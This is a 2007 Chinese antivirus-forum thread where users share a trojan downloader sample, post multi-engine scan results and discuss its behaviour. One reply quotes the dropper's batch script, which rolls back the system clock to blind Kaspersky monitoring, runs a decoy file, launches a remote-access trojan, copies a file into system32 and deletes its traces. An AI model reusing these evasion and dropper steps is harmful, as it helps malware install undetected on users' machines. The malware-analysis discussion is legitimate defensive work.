MD5: CDEC3F

显示全部楼层 · 发表于 2007-8-30 00:13:16

ClamAV

0.91.1

4106

2007-08-29

Trojan.Crypted-4

0.461

IKARUS

T3.1.1.12

2007.08.28.69413

2007-08-28

suspicious(level 160)

1.370

NOD32

2.70.8

2490

2007-08-29

probably unknown NewHeur_PE virus

0.023

QuickHeal	9.00	2007.08.28	2007-08-28	Suspicious - DNAScan	2.287
SOPHOS	2.49.1	4.21	2007-08-29	Mal/Emogen-B	2.323
VBA32	3.12.2.3	20070828.0758	2007-08-28	Embedded.Trojan-Downloader.Win32.Banload.awy (suspicious)	0.751
VirusBuster	4.3.19:9	9.099.8/11.0	2007-08-28	Packed/FSG	0.967

小红伞

7.4.1.66

6.39.1.60

2007-08-29

TR/Crypt.ULPM.Gen

2.424

熊猫卫士

9.04.03.0001

2007.08.28

2007-08-28

Suspicious file无敌

3.098

诺曼

5.91.04

5.90

2007-08-29

Suspicious_F.gen

2.911

迈克菲

5.1.00

5107

2007-08-28

New Malware.cj

1.020

显示全部楼层 · 发表于 2007-8-30 00:17:48

Uhthn Anti-Spyware V3 Alpha

Version - 3.0.0
Heuristics - OPEN
Scan in - C:\Documents and Settings\uhthn\Desktop\virus

C:\Documents and Settings\uhthn\Desktop\virus\象.exe - Suspicious of Trojan-PSW.Game.2

1 Files scanned
0 Infected files found
1 Suspicious files found
0 Files cured
0 Files deleted

显示全部楼层 · 发表于 2007-8-30 00:21:41

卡巴 7.0.0.125 扫描飘过

好像是修改系统时间的，运行后文件自动删除。

[ 本帖最后由浪滔天于 2007-8-30 00:23 编辑 ]

显示全部楼层 · 发表于 2007-8-30 00:22:36

Downloader

显示全部楼层 · 发表于 2007-8-30 00:23:05

原帖由 浪滔天 于 2007-8-30 00:21 发表
卡巴 7.0.0.125 扫描飘过

好像是修改系统时间的，运行后文件自动删除。

::======修改系统时间使卡巴监控失效============
date 1980-01-01
date 1980-01-01
::======运行表面程序==========================
%systemroot%\temp\1.bmp
::========倒计时等待10秒======================
@echo off & setlocal enableextensions
echo WScript.Sleep 1000 > %temp%.\tmp$$$.vbs
set /a i = 5
:Timeout
if %i% == 0 goto Next
setlocal
set /a i = %i% - 1
cscript //nologo %temp%.\tmp$$$.vbs
goto Timeout
goto End
::===========倒计时等待结束运行鸽子=============
:Next
%systemroot%\temp\system.exe
copy %systemroot%\temp\mv.SCR %systemroot%\system32\
for %%f in (%temp%.\tmp$$$.vbs*) do del %%f
::======恢复时间(卡巴监控)=======================
::=========清除痕迹============================
RD /S /Q %systemroot%\temp\

显示全部楼层 · 发表于 2007-8-30 00:24:15

大蜘蛛不报
ＮＯＤ报了　

显示全部楼层 · 发表于 2007-8-30 00:26:32

原帖由 1p1 于 2007-8-30 00:23 发表

::======修改系统时间使卡巴监控失效============
date 1980-01-01
date 1980-01-01
::======运行表面程序==========================
%systemroot%\temp\1.bmp
::========倒计时等待10秒============== ...

不过我安装了360时间防改保护，没中招

显示全部楼层 · 发表于 2007-8-30 00:38:04

中毒可不要怪我，我无心害人的，我发病毒，就是希望少点人中毒，大家运行时自己小心点。。。

显示全部楼层 · 发表于 2007-8-30 00:47:53

原帖由自由于 2007-8-30 00:38 发表
中毒可不要怪我，我无心害人的，我发病毒，就是希望少点人中毒，大家运行时自己小心点。。。

呵呵，放心好了，愿者才上钩~

显示全部楼层 · 发表于 2007-8-31 18:21:04

Win32.Banload.awy

[病毒样本] MD5: CDEC3F

本帖子中包含更多资源

本帖子中包含更多资源

回复 #7 浪滔天的帖子

[病毒样本] MD5: CDEC3F

本帖子中包含更多资源

本帖子中包含更多资源

回复 #7 浪滔天 的帖子

回复 #7 浪滔天的帖子